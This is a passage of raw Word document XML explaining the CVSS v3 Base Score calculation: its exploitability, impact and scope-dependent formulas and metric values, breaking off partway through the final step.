          <w:p w14:paraId="32C039F0" w14:textId="2D7FF5DD" w:rsidR="00460042" w:rsidRPr="00D77DFE" w:rsidRDefault="00460042"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Integrity Impact (I)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2831" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="137B692F" w14:textId="22379EE2" w:rsidR="00460042" w:rsidRPr="00D77DFE" w:rsidRDefault="00620181"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Data modification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2831" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="007EDE02" w14:textId="5D267EF8" w:rsidR="00460042"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None (N), Low (L), High (H)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00460042" w:rsidRPr="00D77DFE" w14:paraId="304508D9" w14:textId="77777777" w:rsidTr="00E821A4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2831" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5A231A31" w14:textId="783E29B8" w:rsidR="00460042" w:rsidRPr="00D77DFE" w:rsidRDefault="00460042"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Availability Impact (A)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2831" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0FB0A79D" w14:textId="2462AAF9" w:rsidR="00460042" w:rsidRPr="00D77DFE" w:rsidRDefault="00620181"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Service disruption</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2831" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="071AF566" w14:textId="42A5E734" w:rsidR="00460042" w:rsidRPr="00D77DFE" w:rsidRDefault="00460042" w:rsidP="00E821A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None (N), Low (L), High (H)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="78EC1E3F" w14:textId="77777777" w:rsidR="002D58A1" w:rsidRDefault="002D58A1" w:rsidP="002D58A1">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71D74248" w14:textId="458776FA" w:rsidR="00952DE4" w:rsidRPr="00D77DFE" w:rsidRDefault="00952DE4" w:rsidP="002D58A1">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">How to calculate the Base Score value </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="173B5F9F" w14:textId="4AE0C2B8" w:rsidR="003B5D99" w:rsidRPr="00D77DFE" w:rsidRDefault="003B5D99" w:rsidP="002F4B94">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>First, it is necessary to calculate the CVSS Base Score value. This process comprises the following steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="172A15FC" w14:textId="50F5D9A4" w:rsidR="00620181"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 xml:space="preserve">Step 1: </w:t>
      </w:r>
      <w:r w:rsidR="00620181" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">Calculating the Exploitability Sub-Score </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F24FAD5" w14:textId="71E88712" w:rsidR="003B5D99" w:rsidRDefault="003B5D99" w:rsidP="002D58A1">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>The Exploitability Sub-Score reflects how feasible it is to exploit a given vulnerability and is calculated using the following formula:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE504B2" w14:textId="6E7E0323" w:rsidR="00620181" w:rsidRPr="005926F0" w:rsidRDefault="005926F0" w:rsidP="005926F0">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <m:oMathPara>
        <m:oMath>
          <m:r>
            <w:rPr>
              <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cstheme="majorBidi"/>
            </w:rPr>
            <m:t>Exploitability=8.22×AV×AC×PR×UI</m:t>
          </m:r>
        </m:oMath>
      </m:oMathPara>
    </w:p>
    <w:p w14:paraId="4E1C8077" w14:textId="77777777" w:rsidR="00952DE4"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Where:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="367943C0" w14:textId="02AB5800" w:rsidR="00952DE4"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 xml:space="preserve">AV </w:t>
      </w:r>
      <w:r w:rsidR="00C429C8" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> Attack Vector</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6528F384" w14:textId="025BAF4D" w:rsidR="00952DE4"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 xml:space="preserve">AC </w:t>
      </w:r>
      <w:r w:rsidR="00C429C8" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> Attack Complexity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F12F5D4" w14:textId="1260D267" w:rsidR="00952DE4"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 xml:space="preserve">PR </w:t>
      </w:r>
      <w:r w:rsidR="00C429C8" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> Privileges Required</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="067DC7ED" w14:textId="27747116" w:rsidR="00952DE4"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 xml:space="preserve">UI </w:t>
      </w:r>
      <w:r w:rsidR="00C429C8" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> User Interaction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C0EB8CB" w14:textId="6C925E95" w:rsidR="00620181" w:rsidRPr="00D77DFE" w:rsidRDefault="002D58A1" w:rsidP="002D58A1">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidR="00952DE4" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">tep 2: </w:t>
      </w:r>
      <w:r w:rsidR="003B5D99" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>Calculation of the Impact Sub-Score</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55BCDE0D" w14:textId="32E7F537" w:rsidR="003B5D99" w:rsidRDefault="003B5D99" w:rsidP="002D58A1">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>The Impact Sub-Score is computed as follows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1456E961" w14:textId="48E70F30" w:rsidR="005926F0" w:rsidRPr="00D77DFE" w:rsidRDefault="005926F0" w:rsidP="002D58A1">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <m:oMathPara>
        <m:oMath>
          <m:r>
            <w:rPr>
              <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cstheme="majorBidi"/>
            </w:rPr>
            <m:t>ISC Base=1-[</m:t>
          </m:r>
          <m:d>
            <m:dPr>
              <m:ctrlPr>
                <w:rPr>
                  <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cstheme="majorBidi"/>
                  <w:i/>
                </w:rPr>
              </m:ctrlPr>
            </m:dPr>
            <m:e>
              <m:r>
                <w:rPr>
                  <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cstheme="majorBidi"/>
                </w:rPr>
                <m:t>1-C</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1-I</m:t>
              </m:r>
            </m:e>
          </m:d>
          <m:r>
            <w:rPr>
              <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cstheme="majorBidi"/>
            </w:rPr>
            <m:t>×</m:t>
          </m:r>
          <m:d>
            <m:dPr>
              <m:ctrlPr>
                <w:rPr>
                  <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cstheme="majorBidi"/>
                  <w:i/>
                </w:rPr>
              </m:ctrlPr>
            </m:dPr>
            <m:e>
              <m:r>
                <w:rPr>
                  <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cstheme="majorBidi"/>
                </w:rPr>
                <m:t>1-A</m:t>
              </m:r>
            </m:e>
          </m:d>
          <m:r>
            <w:rPr>
              <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cstheme="majorBidi"/>
            </w:rPr>
            <m:t>]</m:t>
          </m:r>
        </m:oMath>
      </m:oMathPara>
    </w:p>
    <w:p w14:paraId="76A66F52" w14:textId="27657AEC" w:rsidR="00620181" w:rsidRPr="00D77DFE" w:rsidRDefault="00620181" w:rsidP="002D58A1">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>Where:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7944A629" w14:textId="15010EE9" w:rsidR="00620181" w:rsidRPr="00D77DFE" w:rsidRDefault="00620181" w:rsidP="002D58A1">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">C </w:t>
      </w:r>
      <w:r w:rsidR="00C429C8" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> Confidentiality Impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34840B14" w14:textId="64A5B910" w:rsidR="00620181" w:rsidRPr="00D77DFE" w:rsidRDefault="00620181" w:rsidP="002D58A1">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">I </w:t>
      </w:r>
      <w:r w:rsidR="00C429C8" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> Integrity Impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="021C8DAC" w14:textId="44B99266" w:rsidR="00620181" w:rsidRPr="00D77DFE" w:rsidRDefault="00620181" w:rsidP="002D58A1">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">A </w:t>
      </w:r>
      <w:r w:rsidR="00C429C8" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> Availability Impact </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="079E9557" w14:textId="77777777" w:rsidR="00620181" w:rsidRPr="00D77DFE" w:rsidRDefault="00620181" w:rsidP="002D58A1">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>Each of these has numeric values:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D3EE6A" w14:textId="1E322900" w:rsidR="00620181" w:rsidRPr="00D77DFE" w:rsidRDefault="00620181" w:rsidP="002D58A1">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">None </w:t>
      </w:r>
      <w:r w:rsidR="00C429C8" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="026E411D" w14:textId="77777777" w:rsidR="00620181" w:rsidRPr="00D77DFE" w:rsidRDefault="00620181" w:rsidP="002D58A1">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>Low = 0.22</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AC49886" w14:textId="77777777" w:rsidR="00620181" w:rsidRPr="00D77DFE" w:rsidRDefault="00620181" w:rsidP="002D58A1">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>High = 0.56</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44AAC472" w14:textId="3D3F748E" w:rsidR="003B5D99"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Step 3</w:t>
      </w:r>
      <w:r w:rsidR="003B5D99" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>: Impact Calculation Based on ScopeThe final Impact value depends on whether the scope of the vulnerability is unchanged or changed:</w:t>
      </w:r>
      <w:r w:rsidR="002D58A1" w:rsidRPr="002D58A1">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A33D9DB" w14:textId="3707B1DE" w:rsidR="00952DE4"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If scope is unchanged (</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>S:U) :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <m:oMath>
        <m:r>
          <w:rPr>
            <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cstheme="majorBidi"/>
          </w:rPr>
          <m:t>Impact=6.42 ×ISC Base</m:t>
        </m:r>
      </m:oMath>
    </w:p>
    <w:p w14:paraId="6E73DA3D" w14:textId="77777777" w:rsidR="003B5D99" w:rsidRDefault="00952DE4" w:rsidP="002D58A1">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>If scope is changed (S:C</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>) :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AEA4C73" w14:textId="27A23242" w:rsidR="002D58A1" w:rsidRPr="00D77DFE" w:rsidRDefault="002D58A1" w:rsidP="002D58A1">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <m:oMathPara>
        <m:oMath>
          <m:r>
            <w:rPr>
              <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cstheme="majorBidi"/>
            </w:rPr>
            <m:t>Impact=7.52×</m:t>
          </m:r>
          <m:d>
            <m:dPr>
              <m:ctrlPr>
                <w:rPr>
                  <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cstheme="majorBidi"/>
                  <w:i/>
                </w:rPr>
              </m:ctrlPr>
            </m:dPr>
            <m:e>
              <m:r>
                <w:rPr>
                  <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cstheme="majorBidi"/>
                </w:rPr>
                <m:t>ISC Base-0.029</m:t>
              </m:r>
            </m:e>
          </m:d>
          <m:r>
            <w:rPr>
              <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cstheme="majorBidi"/>
            </w:rPr>
            <m:t>-3.25×</m:t>
          </m:r>
          <m:sSup>
            <m:sSupPr>
              <m:ctrlPr>
                <w:rPr>
                  <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cstheme="majorBidi"/>
                  <w:i/>
                </w:rPr>
              </m:ctrlPr>
            </m:sSupPr>
            <m:e>
              <m:r>
                <w:rPr>
                  <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cstheme="majorBidi"/>
                </w:rPr>
                <m:t>(ISC Base-0.02)</m:t>
              </m:r>
            </m:e>
            <m:sup>
              <m:r>
                <w:rPr>
                  <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cstheme="majorBidi"/>
                </w:rPr>
                <m:t>15</m:t>
              </m:r>
            </m:sup>
          </m:sSup>
        </m:oMath>
      </m:oMathPara>
    </w:p>
    <w:p w14:paraId="60ADC71E" w14:textId="25CF5978" w:rsidR="003B5D99" w:rsidRPr="00D77DFE" w:rsidRDefault="00952DE4" w:rsidP="002D58A1">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 4: </w:t>
      </w:r>
      <w:r w:rsidR="003B5D99" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>Final Base Score CalculationThe Base Score is calculated as follows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="250F0613" w14:textId="107C71A3" w:rsidR="00952DE4" w:rsidRDefault="00952DE4" w:rsidP="002D58A1">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">If scope is unchanged: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F9FCBF0" w14:textId="2CE9DBE8" w:rsidR="00E225AF" w:rsidRPr="00D77DFE" w:rsidRDefault="00E225AF" w:rsidP="003B5D99">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <m:oMathPara>
        <m:oMath>
          <m:r>
            <w:rPr>
              <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cstheme="majorBidi"/>
            </w:rPr>
            <m:t>BaseScore=RoundUp</m:t>
          </m:r>
          <m:d>
            <m:dPr>
              <m:ctrlPr>
                <w:rPr>
                  <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cstheme="majorBidi"/>
                  <w:i/>
                </w:rPr>
              </m:ctrlPr>
            </m:dPr>
            <m:e>
              <m:r>
                <w:rPr>
                  <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cstheme="majorBidi"/>
                </w:rPr>
                <m:t>min</m:t>
              </m:r>
              <m:d>
                <m:dPr>
                  <m:ctrlPr>
                    <w:rPr>
                      <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cstheme="majorBidi"/>
                      <w:i/>
                    </w:rPr>
                  </m:ctrlPr>
                </m:dPr>
                <m:e>
                  <m:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cstheme="majorBidi"/>
                    </w:rPr>
                    <m:t>Impact+Exploitability,10</m:t>
                  </m:r>
                </m:e>
              </m:d>
            </m:e>
          </m:d>
        </m:oMath>
      </m:oMathPara>
    </w:p>
    <w:p w14:paraId="6C25F343" w14:textId="0FF2253E" w:rsidR="00952DE4" w:rsidRDefault="00952DE4" w:rsidP="002D58A1">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>If scope is changed:</w:t>
      </w:r>
